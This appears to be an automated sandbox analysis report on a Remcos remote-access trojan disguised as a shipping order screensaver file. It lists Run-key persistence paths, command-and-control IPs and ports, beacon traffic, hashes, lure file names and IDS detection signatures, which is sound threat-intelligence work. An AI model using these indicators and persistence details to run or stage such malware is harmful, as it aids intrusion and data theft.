                                • Number of executed functions: 99
                                • Number of non-executed functions: 194
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                Time | Type | Description
                                00:01:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WN "C:\ProgramData\Adobe\Adobe.exe"
                                00:01:09 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WN "C:\ProgramData\Adobe\Adobe.exe"
                                00:01:17 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WN "C:\ProgramData\Adobe\Adobe.exe"
                                18:00:57 | API Interceptor | 2x Sleep call for process: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe modified
                                18:00:58 | API Interceptor | 4401588x Sleep call for process: Adobe.exe modified
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                104.250.180.178 | Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exe | malicious | PureLog Stealer, Remcos |
                                104.250.180.178 | CI-PL- HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exe | malicious | PureLog Stealer, XWorm |
                                104.250.180.178 | Doc089776867565357609 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe | malicious | Remcos |
                                104.250.180.178 | PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe | malicious | XWorm |
                                104.250.180.178 | rSOD219ISF-____.scr.exe | malicious | Remcos |
                                104.250.180.178 | rWWTLCLtoUSADCL.scr.exe | malicious | XWorm |
                                104.250.180.178 | ttCOg61bOg.exe | malicious | Remcos |
                                104.250.180.178 | SKM_C364e24092511300346565787689900142344656767788755634232343456768953334466870.scr.exe | malicious | Remcos |
                                104.250.180.178 | ISF #U8a02#U8259#U55ae - KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exe | malicious | XWorm |
                                104.250.180.178 | ISF 10+2 - SO - SO 4042 - ROTHENBERGER USA, INC#U51fa#U8ca8 TWSE0211390.scr.exe | malicious | Remcos |
                                178.237.33.50 | PO 09770_MQ 018370_04847_Order.exe | malicious | Remcos | geoplugin.net/json.gp
                                178.237.33.50 | Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exe | malicious | PureLog Stealer, Remcos | geoplugin.net/json.gp
                                178.237.33.50 | 17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
                                178.237.33.50 | SC_TR126089907.exe | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
                                178.237.33.50 | Sipari#U015f_listesi.xls | malicious | Remcos, HTMLPhisher | geoplugin.net/json.gp
                                178.237.33.50 | Banco Santander Totta _Aconselhamento_Pagamento.img | malicious | Remcos | geoplugin.net/json.gp
                                178.237.33.50 | remi.exe | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
                                178.237.33.50 | rem.exe | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
                                178.237.33.50 | Salary Revision _pdf.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
                                178.237.33.50 | BUNKER INVOICE #U2018MV.SUN OCEAN.pdf.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                geoplugin.net | PO 09770_MQ 018370_04847_Order.exe | malicious | Remcos | 178.237.33.50
                                geoplugin.net | Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exe | malicious | PureLog Stealer, Remcos | 178.237.33.50
                                geoplugin.net | 17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exe | malicious | Remcos | 178.237.33.50
                                geoplugin.net | SC_TR126089907.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                geoplugin.net | Sipari#U015f_listesi.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
                                geoplugin.net | Banco Santander Totta _Aconselhamento_Pagamento.img | malicious | Remcos | 178.237.33.50
                                geoplugin.net | remi.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                geoplugin.net | rem.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                geoplugin.net | Salary Revision _pdf.vbs | malicious | Remcos, GuLoader | 178.237.33.50
                                geoplugin.net | BUNKER INVOICE #U2018MV.SUN OCEAN.pdf.vbs | malicious | Remcos, GuLoader | 178.237.33.50
                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                M247GB | LM94OE0VNK.exe | malicious | Unknown | 91.202.233.141
                                M247GB | Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exe | malicious | PureLog Stealer, Remcos | 104.250.180.178
                                M247GB | CI-PL- HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exe | malicious | PureLog Stealer, XWorm | 104.250.180.178
                                M247GB | loligang.x86-20241128-1536.elf | malicious | Mirai | 38.95.109.118
                                M247GB | nabmpsl.elf | malicious | Unknown | 38.206.86.187
                                M247GB | nabarm5.elf | malicious | Unknown | 45.74.38.161
                                M247GB | mips.elf | malicious | Unknown | 77.36.125.131
                                M247GB | akcqrfutuo.elf | malicious | Unknown | 154.17.91.183
                                M247GB | Mail-Manager.jar | malicious | Unknown | 184.174.97.32
                                M247GB | nklsh4.elf | malicious | Unknown | 194.71.126.13
                                ATOM86-ASATOM86NL | PO 09770_MQ 018370_04847_Order.exe | malicious | Remcos | 178.237.33.50
                                ATOM86-ASATOM86NL | Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exe | malicious | PureLog Stealer, Remcos | 178.237.33.50
                                ATOM86-ASATOM86NL | 17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exe | malicious | Remcos | 178.237.33.50
                                ATOM86-ASATOM86NL | SC_TR126089907.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                ATOM86-ASATOM86NL | Sipari#U015f_listesi.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
                                ATOM86-ASATOM86NL | Banco Santander Totta _Aconselhamento_Pagamento.img | malicious | Remcos | 178.237.33.50
                                ATOM86-ASATOM86NL | remi.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                ATOM86-ASATOM86NL | rem.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                ATOM86-ASATOM86NL | Salary Revision _pdf.vbs | malicious | Remcos, GuLoader | 178.237.33.50
                                ATOM86-ASATOM86NL | BUNKER INVOICE #U2018MV.SUN OCEAN.pdf.vbs | malicious | Remcos, GuLoader | 178.237.33.50
                                                    No context
                                                    No context
                                                    Process:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1013760
                                                    Entropy (8bit):7.866792196976269
                                                    Encrypted:false
                                                    SSDEEP:24576:M1zGUxjPe4rOMAsZXQsjoMCgkVbjw1292uP3:CL5e4CMAYXiMCFVbjw49bP
                                                    MD5:2108FE4BC36C181C43D01825B56D8349
                                                    SHA1:274E3B1BE233129A95658FE508706C0EBC4114A5
                                                    SHA-256:F36C39084B68E1C96F6D960A9DEF941304A3B2F93907D6650587125627BAA89F
                                                    SHA-512:955AA8CB40EFDA2B44DC3A84A849C7941F20D801ABC5DA35C020038603CA6718DE826AAF93DCDD958A5CE1808DF9B25378F72ECB39B9D0F495771B2F773FA96B
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.a...............0..n............... ........@.. ....................................@.....................................O....................................z..p............................................ ............... ..H............text....m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B.......................H.......PI..\'...........p..`..............................................}.....(.......(.......s#...}....*.0............(.....s......o.....*B..{......o%....*B..{......o$....*.0............{....(.......(....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0..5.........s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.
                                                    Process:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                    Process:C:\ProgramData\Adobe\Adobe.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                    Process:C:\ProgramData\Adobe\Adobe.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):963
                                                    Entropy (8bit):5.014904284428935
                                                    Encrypted:false
                                                    SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                    MD5:B66CFB6461E507BB577CDE91F270844E
                                                    SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                    SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                    SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                    Malicious:false
                                                    Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.866792196976269
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    File size:1'013'760 bytes
                                                    MD5:2108fe4bc36c181c43d01825b56d8349
                                                    SHA1:274e3b1be233129a95658fe508706c0ebc4114a5
                                                    SHA256:f36c39084b68e1c96f6d960a9def941304a3b2f93907d6650587125627baa89f
                                                    SHA512:955aa8cb40efda2b44dc3a84a849c7941f20d801abc5da35c020038603ca6718de826aaf93dcdd958a5ce1808df9b25378f72ecb39b9d0f495771b2f773fa96b
                                                    SSDEEP:24576:M1zGUxjPe4rOMAsZXQsjoMCgkVbjw1292uP3:CL5e4CMAYXiMCFVbjw49bP
                                                    TLSH:7D251255266BD912D4E24BB00A92E3F803798E8DA902D307DBDDBEFF7D2A7163440395
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.a...............0..n............... ........@.. ....................................@................................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x4f8cfe
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xD7610664 [Mon Jul 3 10:54:28 2084 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf8ca9 | 0x4f | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfa000 | 0x59c | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfc000 | 0xc | .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf7a0c | 0x70 | .text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                    .text | 0x2000 | 0xf6d04 | 0xf6e00 | 05f8052f4e37a53152fbf7ab238e165e | False | 0.9462589003164557 | data | 7.871355192949315 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc | 0xfa000 | 0x59c | 0x600 | 57ccb1a74c92bf3fab152485a391b365 | False | 0.4186197916666667 | data | 4.05504982150493 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc | 0xfc000 | 0xc | 0x200 | c07df16482895c19725b600f825abdd7 | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                    RT_VERSION | 0xfa090 | 0x30c | data | | | 0.43333333333333335
                                                    RT_MANIFEST | 0xfa3ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                    DLL | Import
                                                    mscoree.dll | _CorExeMain
                                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                    2024-11-29T00:01:03.649524+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49707 | 104.250.180.178 | 7902 | TCP
                                                    2024-11-29T00:01:07.285991+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49709 | 178.237.33.50 | 80 | TCP
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Nov 29, 2024 00:01:01.857283115 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:01.977406979 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:01.977544069 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:01.984013081 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:02.104063034 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:03.606601954 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:03.649523973 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:03.892734051 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:03.901945114 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:04.021923065 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:04.022051096 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:04.142208099 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:04.762689114 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:04.764178991 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:04.884171009 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:05.045968056 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:05.087038994 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:05.258239985 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:01:05.378228903 CET | 80 | 49709 | 178.237.33.50 | 192.168.2.5
                                                    Nov 29, 2024 00:01:05.378485918 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:01:05.378568888 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:01:05.498648882 CET | 80 | 49709 | 178.237.33.50 | 192.168.2.5
                                                    Nov 29, 2024 00:01:07.282659054 CET | 80 | 49709 | 178.237.33.50 | 192.168.2.5
                                                    Nov 29, 2024 00:01:07.285990953 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:01:07.296622992 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:07.416698933 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:08.275535107 CET | 80 | 49709 | 178.237.33.50 | 192.168.2.5
                                                    Nov 29, 2024 00:01:08.275621891 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:01:24.422519922 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:24.423916101 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:24.544655085 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:54.442519903 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:01:54.444097042 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:01:54.564043999 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:02:24.442744970 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:02:24.443933964 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:02:24.563977957 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:02:54.452651024 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:02:54.453811884 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:02:54.573740959 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:02:55.087402105 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:02:55.399677992 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:02:56.009061098 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:02:57.212177038 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:02:59.618447065 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:03:04.602837086 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:03:14.212205887 CET | 49709 | 80 | 192.168.2.5 | 178.237.33.50
                                                    Nov 29, 2024 00:03:24.473258972 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:03:24.477674007 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:03:24.597573042 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:03:54.483273983 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:03:54.489243031 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:03:54.609278917 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:04:24.482772112 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:04:24.484220982 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:04:24.604861021 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:04:54.502880096 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Nov 29, 2024 00:04:54.504236937 CET | 49707 | 7902 | 192.168.2.5 | 104.250.180.178
                                                    Nov 29, 2024 00:04:54.624169111 CET | 7902 | 49707 | 104.250.180.178 | 192.168.2.5
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Nov 29, 2024 00:01:05.100976944 CET | 57798 | 53 | 192.168.2.5 | 1.1.1.1
                                                    Nov 29, 2024 00:01:05.241297007 CET | 53 | 57798 | 1.1.1.1 | 192.168.2.5
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                    Nov 29, 2024 00:01:05.100976944 CET | 192.168.2.5 | 1.1.1.1 | 0x9e2c | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Nov 29, 2024 00:01:05.241297007 CET | 1.1.1.1 | 192.168.2.5 | 0x9e2c | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                    • geoplugin.net
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.5 | 49709 | 178.237.33.50 | 80 | 1532 | C:\ProgramData\Adobe\Adobe.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 29, 2024 00:01:05.378568888 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                    Host: geoplugin.net
                                                    Cache-Control: no-cache
                                                    Nov 29, 2024 00:01:07.282659054 CET | 1171 | IN | HTTP/1.1 200 OK
